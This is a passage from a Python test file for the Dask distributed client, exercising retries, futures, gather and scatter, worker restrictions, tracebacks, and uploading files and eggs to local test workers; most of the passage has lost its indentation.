x = c.persist(delayed(varying(args))())
fut = c.compute(x)
with pytest.raises(ZeroDivisionError, match="one"):
await fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
await fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=2)
assert await fut == 3
args.append(4)
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=3)
assert await fut == 3
@gen_cluster(client=True)
async def test_persist_retries(c, s, a, b):
# Same retries for all
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = c.persist(delayed(varying(args))(), retries=1)
x = c.compute(x)
with pytest.raises(ZeroDivisionError, match="two"):
await x
x = c.persist(delayed(varying(args))(), retries=2)
x = c.compute(x)
assert await x == 3
@gen_cluster(client=True)
async def test_persist_retries_annotations(c, s, a, b):
# Per-key retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
x = delayed(varying(xargs))()
with dask.annotate(retries=2):
y = delayed(varying(yargs))()
z = delayed(varying(zargs))()
x, y, z = c.persist([x, y, z], optimize_graph=False)
x, y, z = c.compute([x, y, z])
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 70
assert await z == 80
@gen_cluster(client=True)
async def test_retries_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = await future
assert y == 100
@gen_cluster(client=True)
async def test_future_repr(c, s, a, b):
pd = pytest.importorskip("pandas")
x = c.submit(inc, 10)
y = c.submit(pd.DataFrame, {"x": [1, 2, 3]})
await x
await y
for func in [repr, lambda x: x._repr_html_()]:
assert str(x.key) in func(x)
assert str(x.status) in func(x)
assert str(x.status) in repr(c.futures[x.key])
assert "int" in func(x)
assert "pandas" in func(y)
assert "DataFrame" in func(y)
@gen_cluster(client=True)
async def test_future_tuple_repr(c, s, a, b):
da = pytest.importorskip("dask.array")
y = da.arange(10, chunks=(5,)).persist()
f = futures_of(y)[0]
for func in [repr, lambda x: x._repr_html_()]:
for k in f.key:
assert str(k) in func(f)
@gen_cluster(client=True)
async def test_Future_exception(c, s, a, b):
x = c.submit(div, 1, 0)
result = await x.exception()
assert isinstance(result, ZeroDivisionError)
x = c.submit(div, 1, 1)
result = await x.exception()
assert result is None
def test_Future_exception_sync(c):
x = c.submit(div, 1, 0)
assert isinstance(x.exception(), ZeroDivisionError)
x = c.submit(div, 1, 1)
assert x.exception() is None
@gen_cluster(client=True)
async def test_Future_release(c, s, a, b):
# Released Futures should be removed timely from the Client
x = c.submit(div, 1, 1)
await x
x.release()
await asyncio.sleep(0)
assert not c.futures
x = c.submit(slowinc, 1, delay=0.5)
x.release()
await asyncio.sleep(0)
assert not c.futures
x = c.submit(div, 1, 0)
await x.exception()
x.release()
await asyncio.sleep(0)
assert not c.futures
def test_Future_release_sync(c):
# Released Futures should be removed timely from the Client
x = c.submit(div, 1, 1)
x.result()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(slowinc, 1, delay=0.8)
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(div, 1, 0)
x.exception()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
def test_short_tracebacks(loop, c):
tblib = pytest.importorskip("tblib")
future = c.submit(div, 1, 0)
try:
future.result()
except Exception:
_, _, tb = sys.exc_info()
tb = tblib.Traceback(tb).to_dict()
n = 0
while tb is not None:
n += 1
tb = tb["tb_next"]
assert n < 5
@gen_cluster(client=True)
async def test_map_naming(c, s, a, b):
L1 = c.map(inc, range(5))
L2 = c.map(inc, range(5))
assert [x.key for x in L1] == [x.key for x in L2]
L3 = c.map(inc, [1, 1, 1, 1])
assert len({x._state for x in L3}) == 1
L4 = c.map(inc, [1, 1, 1, 1], pure=False)
assert len({x._state for x in L4}) == 4
@gen_cluster(client=True)
async def test_submit_naming(c, s, a, b):
a = c.submit(inc, 1)
b = c.submit(inc, 1)
assert a._state is b._state
c = c.submit(inc, 1, pure=False)
assert c.key != a.key
@gen_cluster(client=True)
async def test_exceptions(c, s, a, b):
x = c.submit(div, 1, 2)
result = await x
assert result == 1 / 2
x = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
await x
x = c.submit(div, 10, 2) # continues to operate
result = await x
assert result == 10 / 2
@gen_cluster()
async def test_gc(s, a, b):
c = await Client(s.address, asynchronous=True)
x = c.submit(inc, 10)
await x
assert s.tasks[x.key].who_has
x.__del__()
await async_wait_for(
lambda: x.key not in s.tasks or not s.tasks[x.key].who_has, timeout=0.3
)
await c.close()
def test_thread(c):
x = c.submit(inc, 1)
assert x.result() == 2
x = c.submit(slowinc, 1, delay=0.3)
with pytest.raises(TimeoutError):
x.result(timeout="10 ms")
assert x.result() == 2
def test_sync_exceptions(c):
x = c.submit(div, 10, 2)
assert x.result() == 5
y = c.submit(div, 10, 0)
try:
y.result()
assert False
except ZeroDivisionError:
pass
z = c.submit(div, 10, 5)
assert z.result() == 2
@gen_cluster(client=True)
async def test_gather(c, s, a, b):
x = c.submit(inc, 10)
y = c.submit(inc, x)
result = await c.gather(x)
assert result == 11
result = await c.gather([x])
assert result == [11]
result = await c.gather({"x": x, "y": [y]})
assert result == {"x": 11, "y": [12]}
@gen_cluster(client=True)
async def test_gather_lost(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
await a.close()
with pytest.raises(Exception):
await c.gather([x, y])
def test_gather_sync(c):
x = c.submit(inc, 1)
assert c.gather(x) == 2
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
c.gather([x, y])
[xx] = c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True)
async def test_gather_strict(c, s, a, b):
x = c.submit(div, 2, 1)
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
await c.gather([x, y])
[xx] = await c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_gather_skip(c, s, a):
x = c.submit(div, 1, 0, priority=10)
y = c.submit(slowinc, 1, delay=0.5)
with captured_logger(logging.getLogger("distributed.scheduler")) as sched:
with captured_logger(logging.getLogger("distributed.client")) as client:
L = await c.gather([x, y], errors="skip")
assert L == [2]
assert not client.getvalue()
assert not sched.getvalue()
@gen_cluster(client=True)
async def test_limit_concurrent_gathering(c, s, a, b):
futures = c.map(inc, range(100))
await c.gather(futures)
assert len(a.outgoing_transfer_log) + len(b.outgoing_transfer_log) < 100
@gen_cluster(client=True, timeout=None)
async def test_get(c, s, a, b):
future = c.get({"x": (inc, 1)}, "x", sync=False)
assert isinstance(future, Future)
result = await future
assert result == 2
futures = c.get({"x": (inc, 1)}, ["x"], sync=False)
assert isinstance(futures[0], Future)
result = await c.gather(futures)
assert result == [2]
futures = c.get({}, [], sync=False)
result = await c.gather(futures)
assert result == []
result = await c.get(
{("x", 1): (inc, 1), ("x", 2): (inc, ("x", 1))}, ("x", 2), sync=False
)
assert result == 3
def test_get_sync(c):
assert c.get({"x": (inc, 1)}, "x") == 2
def test_no_future_references(c):
from weakref import WeakSet
ws = WeakSet()
futures = c.map(inc, range(10))
ws.update(futures)
del futures
import gc
gc.collect()
start = time()
while list(ws):
sleep(0.01)
assert time() < start + 2
def test_get_sync_optimize_graph_passes_through(c):
bag = db.range(10, npartitions=3).map(inc)
dask.compute(bag.sum(), optimize_graph=False)
@gen_cluster(client=True)
async def test_gather_errors(c, s, a, b):
def f(a, b):
raise TypeError
def g(a, b):
raise AttributeError
future_f = c.submit(f, 1, 2)
future_g = c.submit(g, 1, 2)
with pytest.raises(TypeError):
await c.gather(future_f)
with pytest.raises(AttributeError):
await c.gather(future_g)
await a.close()
@gen_cluster(client=True)
async def test_wait(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
z = c.submit(inc, 2)
done, not_done = await wait([x, y, z])
assert done == {x, y, z}
assert not_done == set()
assert x.status == y.status == "finished"
@gen_cluster(client=True)
async def test_wait_first_completed(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, 1)
z = c.submit(inc, 2)
done, not_done = await wait([x, y, z], return_when="FIRST_COMPLETED")
assert done == {z}
assert not_done == {x, y}
assert z.status == "finished"
assert x.status == "pending"
assert y.status == "pending"
@gen_cluster(client=True, timeout=2)
async def test_wait_timeout(c, s, a, b):
future = c.submit(sleep, 0.3)
with pytest.raises(TimeoutError):
await wait(future, timeout=0.01)
def test_wait_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
done, not_done = wait([x, y])
assert done == {x, y}
assert not_done == set()
assert x.status == y.status == "finished"
future = c.submit(sleep, 0.3)
with pytest.raises(TimeoutError):
wait(future, timeout=0.01)
def test_wait_informative_error_for_timeouts(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
try:
wait(x, y)
except Exception as e:
assert "timeout" in str(e)
assert "list" in str(e)
@gen_cluster(client=True)
async def test_garbage_collection(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
assert c.refcount[x.key] == 2
x.__del__()
await asyncio.sleep(0)
assert c.refcount[x.key] == 1
z = c.submit(inc, y)
y.__del__()
await asyncio.sleep(0)
result = await z
assert result == 3
ykey = y.key
y.__del__()
await asyncio.sleep(0)
assert ykey not in c.futures
@gen_cluster(client=True)
async def test_garbage_collection_with_scatter(c, s, a, b):
[future] = await c.scatter([1])
assert future.key in c.futures
assert future.status == "finished"
assert s.who_wants[future.key] == {c.id}
key = future.key
assert c.refcount[key] == 1
future.__del__()
await asyncio.sleep(0)
assert c.refcount[key] == 0
start = time()
while True:
if key not in s.tasks or not s.tasks[key].who_has:
break
else:
assert time() < start + 3
await asyncio.sleep(0.1)
@gen_cluster(timeout=1000, client=True)
async def test_recompute_released_key(c, s, a, b):
x = c.submit(inc, 100)
result1 = await x
xkey = x.key
del x
import gc
gc.collect()
await asyncio.sleep(0)
assert c.refcount[xkey] == 0
# 1 second batching needs a second action to trigger
while xkey in s.tasks and s.tasks[xkey].who_has or xkey in a.data or xkey in b.data:
await asyncio.sleep(0.1)
x = c.submit(inc, 100)
assert x.key in c.futures
result2 = await x
assert result1 == result2
@pytest.mark.slow
@gen_cluster(client=True)
async def test_long_tasks_dont_trigger_timeout(c, s, a, b):
from time import sleep
x = c.submit(sleep, 3)
await x
@pytest.mark.skip
@gen_cluster(client=True)
async def test_missing_data_heals(c, s, a, b):
a.validate = False
b.validate = False
x = c.submit(inc, 1)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([x, y, z])
# Secretly delete y's key
if y.key in a.data:
del a.data[y.key]
a.release_key(y.key)
if y.key in b.data:
del b.data[y.key]
b.release_key(y.key)
await asyncio.sleep(0)
w = c.submit(add, y, z)
result = await w
assert result == 3 + 4
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_missing_data(c, s, a, b):
a.validate = False
b.validate = False
x, y, z = c.map(inc, range(3))
await wait([x, y, z]) # everything computed
for f in [x, y]:
for w in [a, b]:
if f.key in w.data:
del w.data[f.key]
await asyncio.sleep(0)
w.release_key(f.key)
xx, yy, zz = await c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_nested_missing_data(c, s, a, b):
a.validate = False
b.validate = False
w = c.submit(inc, 1)
x = c.submit(inc, w)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([z])
for worker in [a, b]:
for datum in [y, z]:
if datum.key in worker.data:
del worker.data[datum.key]
await asyncio.sleep(0)
worker.release_key(datum.key)
result = await c.gather([z])
assert result == [inc(inc(inc(inc(1))))]
@gen_cluster(client=True)
async def test_tokenize_on_futures(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
tok = tokenize(x)
assert tokenize(x) == tokenize(x)
assert tokenize(x) == tokenize(y)
c.futures[x.key].finish()
assert tok == tokenize(y)
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_submit(c, s, a, b):
x = c.submit(inc, 1, workers={a.ip})
y = c.submit(inc, x, workers={b.ip})
await wait([x, y])
assert s.host_restrictions[x.key] == {a.ip}
assert x.key in a.data
assert s.host_restrictions[y.key] == {b.ip}
assert y.key in b.data
@gen_cluster(client=True)
async def test_restrictions_ip_port(c, s, a, b):
x = c.submit(inc, 1, workers={a.address})
y = c.submit(inc, x, workers={b.address})
await wait([x, y])
assert s.worker_restrictions[x.key] == {a.address}
assert x.key in a.data
assert s.worker_restrictions[y.key] == {b.address}
assert y.key in b.data
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_map(c, s, a, b):
L = c.map(inc, range(5), workers={a.ip})
await wait(L)
assert set(a.data) == {x.key for x in L}
assert not b.data
for x in L:
assert s.host_restrictions[x.key] == {a.ip}
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_get(c, s, a, b):
dsk = {"x": 1, "y": (inc, "x"), "z": (inc, "y")}
futures = c.get(dsk, ["y", "z"], workers=a.ip, sync=False)
result = await c.gather(futures)
assert result == [2, 3]
assert "y" in a.data
assert "z" in a.data
assert len(b.data) == 0
@gen_cluster(client=True)
async def test_restrictions_get_annotate(c, s, a, b):
x = 1
with dask.annotate(workers=a.address):
y = delayed(inc)(x)
with dask.annotate(workers=b.address):
z = delayed(inc)(y)
futures = c.get(z.__dask_graph__(), [y.key, z.key], sync=False)
result = await c.gather(futures)
assert result == [2, 3]
assert y.key in a.data
assert z.key in b.data
@gen_cluster(client=True)
async def dont_test_bad_restrictions_raise_exception(c, s, a, b):
z = c.submit(inc, 2, workers={"bad-address"})
try:
await z
assert False
except ValueError as e:
assert "bad-address" in str(e)
assert z.key in str(e)
@gen_cluster(client=True, timeout=None)
async def test_remove_worker(c, s, a, b):
L = c.map(inc, range(20))
await wait(L)
await b.close()
assert b.address not in s.workers
result = await c.gather(L)
assert result == list(map(inc, range(20)))
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_errors_dont_block(c, s, w):
L = [c.submit(inc, 1), c.submit(throws, 1), c.submit(inc, 2), c.submit(throws, 2)]
start = time()
while not (L[0].status == L[2].status == "finished"):
assert time() < start + 5
await asyncio.sleep(0.01)
result = await c.gather([L[0], L[2]])
assert result == [2, 3]
@gen_cluster(client=True)
async def test_submit_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
x = c.submit(assert_list, [1, 2, 3])
result = await x
assert result
x = c.submit(assert_list, [1, 2, 3], z=[4, 5, 6])
result = await x
assert result
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(assert_list, [x, y])
result = await z
assert result
@gen_cluster(client=True)
async def test_map_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
L = c.map(assert_list, [[1, 2, 3], [4]])
result = await c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], z=[10])
result = await c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], [[]] * 3)
result = await c.gather(L)
assert all(result)
@gen_cluster()
async def test_two_consecutive_clients_share_results(s, a, b):
c = await Client(s.address, asynchronous=True)
x = c.submit(random.randint, 0, 1000, pure=True)
xx = await x
f = await Client(s.address, asynchronous=True)
y = f.submit(random.randint, 0, 1000, pure=True)
yy = await y
assert xx == yy
await c.close()
await f.close()
@gen_cluster(client=True)
async def test_submit_then_get_with_Future(c, s, a, b):
x = c.submit(slowinc, 1)
dsk = {"y": (inc, x)}
result = await c.get(dsk, "y", sync=False)
assert result == 3
@gen_cluster(client=True)
async def test_aliases(c, s, a, b):
x = c.submit(inc, 1)
dsk = {"y": x}
result = await c.get(dsk, "y", sync=False)
assert result == 2
@gen_cluster(client=True)
async def test_aliases_2(c, s, a, b):
dsk_keys = [
({"x": (inc, 1), "y": "x", "z": "x", "w": (add, "y", "z")}, ["y", "w"]),
({"x": "y", "y": 1}, ["x"]),
({"x": 1, "y": "x", "z": "y", "w": (inc, "z")}, ["w"]),
]
for dsk, keys in dsk_keys:
result = await c.gather(c.get(dsk, keys, sync=False))
assert list(result) == list(dask.get(dsk, keys))
await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_scatter(c, s, a, b):
d = await c.scatter({"y": 20})
assert isinstance(d["y"], Future)
assert a.data.get("y") == 20 or b.data.get("y") == 20
y_who_has = s.get_who_has(keys=["y"])["y"]
assert a.address in y_who_has or b.address in y_who_has
assert s.get_nbytes(summary=False) == {"y": sizeof(20)}
yy = await c.gather([d["y"]])
assert yy == [20]
[x] = await c.scatter([10])
assert isinstance(x, Future)
assert a.data.get(x.key) == 10 or b.data.get(x.key) == 10
xx = await c.gather([x])
x_who_has = s.get_who_has(keys=[x.key])[x.key]
assert s.tasks[x.key].who_has
assert (
s.workers[a.address] in s.tasks[x.key].who_has
or s.workers[b.address] in s.tasks[x.key].who_has
)
assert s.get_nbytes(summary=False) == {"y": sizeof(20), x.key: sizeof(10)}
assert xx == [10]
z = c.submit(add, x, d["y"]) # submit works on Future
result = await z
assert result == 10 + 20
result = await c.gather([z, x])
assert result == [30, 10]
@gen_cluster(client=True)
async def test_scatter_types(c, s, a, b):
d = await c.scatter({"x": 1})
assert isinstance(d, dict)
assert list(d) == ["x"]
for seq in [[1], (1,), {1}, frozenset([1])]:
L = await c.scatter(seq)
assert isinstance(L, type(seq))
assert len(L) == 1
s.validate_state()
seq = await c.scatter(range(5))
assert isinstance(seq, list)
assert len(seq) == 5
s.validate_state()
@gen_cluster(client=True)
async def test_scatter_non_list(c, s, a, b):
x = await c.scatter(1)
assert isinstance(x, Future)
result = await x
assert result == 1
@gen_cluster(client=True)
async def test_scatter_hash(c, s, a, b):
[a] = await c.scatter([1])
[b] = await c.scatter([1])
assert a.key == b.key
s.validate_state()
@gen_cluster(client=True)
async def test_scatter_tokenize_local(c, s, a, b):
from dask.base import normalize_token
class MyObj:
pass
L = []
@normalize_token.register(MyObj)
def f(x):
L.append(x)
return "x"
obj = MyObj()
future = await c.scatter(obj)
assert L and L[0] is obj
@gen_cluster(client=True)
async def test_scatter_singletons(c, s, a, b):
np = pytest.importorskip("numpy")
pd = pytest.importorskip("pandas")
for x in [1, np.ones(5), pd.DataFrame({"x": [1, 2, 3]})]:
future = await c.scatter(x)
result = await future
assert str(result) == str(x)
@gen_cluster(client=True)
async def test_scatter_typename(c, s, a, b):
future = await c.scatter(123)
assert future.key.startswith("int")
@gen_cluster(client=True)
async def test_scatter_hash_2(c, s, a, b):
x = await c.scatter(123)
y = await c.scatter(123)
assert x.key == y.key
z = await c.scatter(123, hash=False)
assert z.key != y.key
@gen_cluster(client=True)
async def test_get_releases_data(c, s, a, b):
await c.gather(c.get({"x": (inc, 1)}, ["x"], sync=False))
import gc
gc.collect()
start = time()
while c.refcount["x"]:
await asyncio.sleep(0.01)
assert time() < start + 2
def test_current(s, a, b):
with Client(s["address"]) as c:
assert Client.current() is c
with pytest.raises(ValueError):
Client.current()
with Client(s["address"]) as c:
assert Client.current() is c
def test_global_clients(loop):
assert _get_global_client() is None
with pytest.raises(ValueError):
default_client()
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert _get_global_client() is c
assert default_client() is c
with Client(s["address"], loop=loop) as f:
assert _get_global_client() is f
assert default_client() is f
assert default_client(c) is c
assert default_client(f) is f
assert _get_global_client() is None
@gen_cluster(client=True)
async def test_exception_on_exception(c, s, a, b):
x = c.submit(lambda: 1 / 0)
y = c.submit(inc, x)
with pytest.raises(ZeroDivisionError):
await y
z = c.submit(inc, y)
with pytest.raises(ZeroDivisionError):
await z
@gen_cluster(client=True)
async def test_get_nbytes(c, s, a, b):
[x] = await c.scatter([1])
assert s.get_nbytes(summary=False) == {x.key: sizeof(1)}
y = c.submit(inc, x)
await y
assert s.get_nbytes(summary=False) == {x.key: sizeof(1), y.key: sizeof(2)}
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_nbytes_determines_worker(c, s, a, b):
x = c.submit(identity, 1, workers=[a.ip])
y = c.submit(identity, tuple(range(100)), workers=[b.ip])
await c.gather([x, y])
z = c.submit(lambda x, y: None, x, y)
await z
assert s.tasks[z.key].who_has == {s.workers[b.address]}
@gen_cluster(client=True)
async def test_if_intermediates_clear_on_error(c, s, a, b):
x = delayed(div, pure=True)(1, 0)
y = delayed(div, pure=True)(1, 2)
z = delayed(add, pure=True)(x, y)
f = c.compute(z)
with pytest.raises(ZeroDivisionError):
await f
s.validate_state()
assert not any(ts.who_has for ts in s.tasks.values())
@gen_cluster(
client=True, config={"distributed.scheduler.default-task-durations": {"f": "1ms"}}
)
async def test_pragmatic_move_small_data_to_large_data(c, s, a, b):
np = pytest.importorskip("numpy")
lists = c.map(np.ones, [10000] * 10, pure=False)
sums = c.map(np.sum, lists)
total = c.submit(sum, sums)
def f(x, y):
return None
results = c.map(f, lists, [total] * 10)
await wait([total])
await wait(results)
assert (
sum(
s.tasks[r.key].who_has.issubset(s.tasks[l.key].who_has)
for l, r in zip(lists, results)
)
>= 9
)
@gen_cluster(client=True)
async def test_get_with_non_list_key(c, s, a, b):
dsk = {("x", 0): (inc, 1), 5: (inc, 2)}
x = await c.get(dsk, ("x", 0), sync=False)
y = await c.get(dsk, 5, sync=False)
assert x == 2
assert y == 3
@gen_cluster(client=True)
async def test_get_with_error(c, s, a, b):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
await c.get(dsk, "y", sync=False)
def test_get_with_error_sync(c):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
c.get(dsk, "y")
@gen_cluster(client=True)
async def test_directed_scatter(c, s, a, b):
await c.scatter([1, 2, 3], workers=[a.address])
assert len(a.data) == 3
assert not b.data
await c.scatter([4, 5], workers=[b.name])
assert len(b.data) == 2
def test_directed_scatter_sync(c, s, a, b, loop):
futures = c.scatter([1, 2, 3], workers=[b["address"]])
has_what = sync(loop, c.scheduler.has_what)
assert len(has_what[b["address"]]) == len(futures)
assert len(has_what[a["address"]]) == 0
@gen_cluster(client=True)
async def test_scatter_direct(c, s, a, b):
future = await c.scatter(123, direct=True)
assert future.key in a.data or future.key in b.data
assert s.tasks[future.key].who_has
assert future.status == "finished"
result = await future
assert result == 123
assert not s.counters["op"].components[0]["scatter"]
result = await future
assert not s.counters["op"].components[0]["gather"]
result = await c.gather(future)
assert not s.counters["op"].components[0]["gather"]
@gen_cluster(client=True)
async def test_scatter_direct_numpy(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.ones(5)
future = await c.scatter(x, direct=True)
result = await future
assert np.allclose(x, result)
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True)
async def test_scatter_direct_broadcast(c, s, a, b):
future2 = await c.scatter(456, direct=True, broadcast=True)
assert future2.key in a.data
assert future2.key in b.data
assert s.tasks[future2.key].who_has == {s.workers[a.address], s.workers[b.address]}
result = await future2
assert result == 456
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_balanced(c, s, *workers):
futures = await c.scatter([1, 2, 3], direct=True)
assert sorted([len(w.data) for w in workers]) == [0, 1, 1, 1]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_broadcast_target(c, s, *workers):
futures = await c.scatter([123, 456], direct=True, workers=workers[0].address)
assert futures[0].key in workers[0].data
assert futures[1].key in workers[0].data
futures = await c.scatter(
[123, 456],
direct=True,
broadcast=True,
workers=[w.address for w in workers[:3]],
)
    assert all(
        f.key in w.data and s.workers[w.address] in s.tasks[f.key].who_has
        for f in futures
        for w in workers[:3]
    )
@gen_cluster(client=True, nthreads=[])
async def test_scatter_direct_empty(c, s):
with pytest.raises((ValueError, TimeoutError)):
await c.scatter(123, direct=True, timeout=0.1)
@gen_cluster(client=True, timeout=None, nthreads=[("127.0.0.1", 1)] * 5)
async def test_scatter_direct_spread_evenly(c, s, *workers):
futures = []
for i in range(10):
future = await c.scatter(i, direct=True)
futures.append(future)
assert all(w.data for w in workers)
@pytest.mark.parametrize("direct", [True, False])
@pytest.mark.parametrize("broadcast", [True, False])
def test_scatter_gather_sync(c, direct, broadcast):
futures = c.scatter([1, 2, 3], direct=direct, broadcast=broadcast)
results = c.gather(futures, direct=direct)
assert results == [1, 2, 3]
delayed(inc)(1).compute(direct=direct)
@gen_cluster(client=True)
async def test_gather_direct(c, s, a, b):
futures = await c.scatter([1, 2, 3])
data = await c.gather(futures, direct=True)
assert data == [1, 2, 3]
@gen_cluster(client=True)
async def test_many_submits_spread_evenly(c, s, a, b):
L = [c.submit(inc, i) for i in range(10)]
await wait(L)
assert a.data and b.data
@gen_cluster(client=True)
async def test_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
tb = await x.traceback()
assert any("x / y" in line for line in pluck(3, traceback.extract_tb(tb)))
@gen_cluster(client=True)
async def test_get_traceback(c, s, a, b):
try:
await c.get({"x": (div, 1, 0)}, "x", sync=False)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
@gen_cluster(client=True)
async def test_gather_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
try:
await c.gather(x)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
def test_traceback_sync(c):
x = c.submit(div, 1, 0)
tb = x.traceback()
assert any(
"x / y" in line
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
y = c.submit(inc, x)
tb2 = y.traceback()
assert set(pluck(3, traceback.extract_tb(tb2))).issuperset(
set(pluck(3, traceback.extract_tb(tb)))
)
z = c.submit(div, 1, 2)
tb = z.traceback()
assert tb is None
@gen_cluster(client=True)
async def test_upload_file(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
for value in [123, 456]:
with tmp_text("myfile.py", "def f():\n return {}".format(value)) as fn:
await c.upload_file(fn)
x = c.submit(g, pure=False)
result = await x
assert result == value
@gen_cluster(client=True)
async def test_upload_file_refresh_delayed(c, s, a, b):
with save_sys_modules():
for value in [123, 456]:
with tmp_text("myfile.py", "def f():\n return {}".format(value)) as fn:
await c.upload_file(fn)
sys.path.append(os.path.dirname(fn))
from myfile import f
b = delayed(f)()
bb = c.compute(b, sync=False)
result = await c.gather(bb)
assert result == value
@gen_cluster(client=True)
async def test_upload_file_no_extension(c, s, a, b):
with tmp_text("myfile", "") as fn:
await c.upload_file(fn)
@gen_cluster(client=True)
async def test_upload_file_zip(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
try:
for value in [123, 456]:
with tmp_text(
"myfile.py", "def f():\n return {}".format(value)
) as fn_my_file:
with zipfile.ZipFile("myfile.zip", "w") as z:
z.write(fn_my_file, arcname=os.path.basename(fn_my_file))
await c.upload_file("myfile.zip")
x = c.submit(g, pure=False)
result = await x
assert result == value
finally:
if os.path.exists("myfile.zip"):
os.remove("myfile.zip")
@gen_cluster(client=True)
async def test_upload_file_egg(c, s, a, b):
def g():
import package_1
import package_2
return package_1.a, package_2.b
# c.upload_file tells each worker to
# - put this file in their local_directory
# - modify their sys.path to include it
# we don't care about the local_directory
# but we do care about restoring the path
with save_sys_modules():
for value in [123, 456]:
with tmpfile() as dirname:
os.mkdir(dirname)
with open(os.path.join(dirname, "setup.py"), "w") as f:
f.write("from setuptools import setup, find_packages\n")
f.write(
'setup(name="my_package", packages=find_packages(), version="{}")\n'.format(
value
)
)
# test a package with an underscore in the name
package_1 = os.path.join(dirname, "package_1")
os.mkdir(package_1)
with open(os.path.join(package_1, "__init__.py"), "w") as f:
f.write("a = {}\n".format(value))
# test multiple top-level packages
package_2 = os.path.join(dirname, "package_2")
os.mkdir(package_2)
with open(os.path.join(package_2, "__init__.py"), "w") as f:
f.write("b = {}\n".format(value))
# compile these into an egg
subprocess.check_call(
[sys.executable, "setup.py", "bdist_egg"], cwd=dirname
)
egg_root = os.path.join(dirname, "dist")
# first file ending with '.egg'
egg_name = [
fname for fname in os.listdir(egg_root) if fname.endswith(".egg")
][0]
egg_path = os.path.join(egg_root, egg_name)
await c.upload_file(egg_path)
os.remove(egg_path)
x = c.submit(g, pure=False)
result = await x
assert result == (value, value)
@gen_cluster(client=True)
async def test_upload_large_file(c, s, a, b):
assert a.local_directory
assert b.local_directory
with tmp_text("myfile", "abc") as fn:
with tmp_text("myfile2", "def") as fn2:
await c._upload_large_file(fn, remote_filename="x")
await c._upload_large_file(fn2)
for w in [a, b]:
assert os.path.exists(os.path.join(w.local_directory, "x"))
assert os.path.exists(os.path.join(w.local_directory, "myfile2"))
with open(os.path.join(w.local_directory, "x")) as f:
assert f.read() == "abc"
with open(os.path.join(w.local_directory, "myfile2")) as f:
assert f.read() == "def"
def test_upload_file_sync(c):
def g():
import myfile
return myfile.x
with tmp_text("myfile.py", "x = 123") as fn:
c.upload_file(fn)
x = c.submit(g)
assert x.result() == 123
